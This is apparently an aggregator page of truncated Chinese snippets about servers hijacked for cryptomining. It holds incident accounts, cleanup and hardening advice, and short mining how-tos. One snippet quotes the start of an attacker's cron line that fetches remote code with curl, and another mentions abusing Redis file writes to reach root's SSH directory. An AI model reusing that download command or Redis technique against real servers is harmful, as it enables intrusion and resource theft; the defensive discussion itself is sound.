crontab,比如 redis 可以把緩存內容寫入本地文件的漏洞,他就可以隨便在服務器的 /root/.s ...
最近公司的一個服務器cpu占用比較高,定時任務出現問題,后來發現竟然給入侵了,用來跑比特幣挖礦,特意分享下挖礦腳本 平時寫點腳本定時任務備份數據庫,最近登上服務器,才發現crontab被串改了。我寫的定時腳本給刪了。。。 就奇怪了,無端端多了幾個計划任務 開始還以為公司那位干的定時任務,我就研究下干什么,查了一下發現是印度IP,發現服務器入侵了 curl fsSL http: . . . : i. ...
2017-11-13 11:01 0 1942 推薦指數:
crontab,比如 redis 可以把緩存內容寫入本地文件的漏洞,他就可以隨便在服務器的 /root/.s ...
一般情況下,挖礦病毒都是自動掃描+自動掛馬生成的,並不會是有專人進行攻擊,所以也比較好清除,注意清除之后需要 check 有無后門。 最重要幾點(也可能是被hack的原因):禁止 ROOT 用戶登陸,ROOT 不能使用弱密碼,FRP 需要配置,不能使用默認選項。 挖礦進程占用的 CPU 資源 ...
最近翻譯了中本聰先生發明比特幣的論文,在這篇論文中他說比特幣的產生由挖礦者計算最優散列值計算得到,第一個計算得到這一散列值的也就是block的第一人將會獲得比特幣。別的人無功而返。看了一些其他的參考資料也是這樣。但是我自己挖礦了好像不是這樣,經過一段時間的挖礦過程后我產生了微量的比特幣 ...
第一步:下載比特幣挖礦軟件 下載地址:http://www.guiminer.org/ 第二步:到礦池注冊帳號,推薦礦池:火幣礦池 注冊地址:https://www.huobi.com 配置文檔 ...
注冊一個礦池賬號,推薦https://www.f2pool.com/通過ssh連接遠程服務器創建一個路徑用來保存挖礦工具使用weget命令下載挖礦工具輸入命令,賬號密碼以參數形式傳入,開始挖礦wget http://downloads.sourceforge.net/project ...
1、找出耗cpu最大的幾個進程以及其啟動腳本命令(post為用戶) # ps aux|head -1;ps aux|grep -v PID|sort -rn -k +3|head | grep post 2、找出的挖礦腳本命令如下: #./sh -u ...
查看哪個進程占據cup 通過 top 或者使用 ps aux 我這個通過top 命令看不到哪個進程占用了cup ,執行 cat /etc/ld.so.preload 查看,里面也加載了異常的 ...
上周末,更新易雲盤的時候,發現阿里雲服務器CPU很高,執行 top 一看,有個進程minerd盡然占用了90%多的CPU, 趕緊百度一下,查到幾篇文章都有人遇到同樣問題 Hu_Wen遇到的和我最相似,下邊是他的解決辦法 http://blog.csdn.net/hu_wen/article ...